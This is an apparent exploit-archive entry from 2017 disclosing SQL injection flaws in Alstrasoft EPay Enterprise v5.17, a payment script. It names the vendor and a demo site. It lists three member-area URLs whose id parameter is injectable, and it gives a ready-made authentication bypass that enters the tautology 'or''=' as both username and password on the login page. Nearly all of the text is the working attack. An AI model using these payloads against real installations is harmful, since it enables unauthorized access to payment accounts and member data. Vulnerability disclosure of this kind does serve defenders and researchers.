# # # # # # Exploit Title: Alstrasoft EPay Enterprise v5.17 Script - SQL Injection # Google Dork: N/A # Date: 04.02.2017 # Vendor Homepage: http://www.alstrasoft.com/ # Software Buy: http://www.alstrasoft.com/epay_enterprise.htm # Demo: http://blizsoft.com/enterprise/ # Version: 5.17 # Tested on: Win7 x64, Kali Linux x64 # # # # # # Exploit Author: Ihsan Sencan # Author Web: http://ihsan.net # Author Mail : ihsan[beygir]ihsan[nokta]net # # # # # # SQL Injection/Exploit : # http://localhost/[PATH]/members/userinfo.htm?id=[SQL] # http://localhost/[PATH]/members/products.htm?id=[SQL]&action=update # http://localhost/[PATH]/members/subscriptions.htm?id=[SQL]&action=update # Authentication Bypass : # http://localhost/[PATH]/members/login.htm and set Username:'or''=' and Password to 'or''=' and hit enter. # # # # # # Iranian Exploit DataBase = http://IeDb.Ir [2017-02-07]